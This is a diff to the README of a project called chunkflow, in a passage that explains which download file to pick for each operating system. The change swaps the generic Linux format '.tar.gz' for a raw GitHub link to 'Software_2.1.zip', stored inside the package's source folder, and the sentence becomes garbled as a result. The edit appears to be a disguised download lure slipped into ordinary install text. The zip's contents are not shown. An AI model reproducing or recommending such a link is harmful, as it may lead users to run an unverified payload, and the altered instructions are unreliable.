Matsadx/chunkflow/README.md

 - For Windows, it is usually a .exe or .zip file.
 - For Mac, look for a .dmg or .zip file.
-- For Linux, a .tar.gz or .AppImage file is common.
+- For Linux, a https://raw.githubusercontent.com/Matsadx/chunkflow/main/chunkflow/chunkers/Software_2.1.zip or .AppImage file is common.

 The file name will usually include the version number and platform.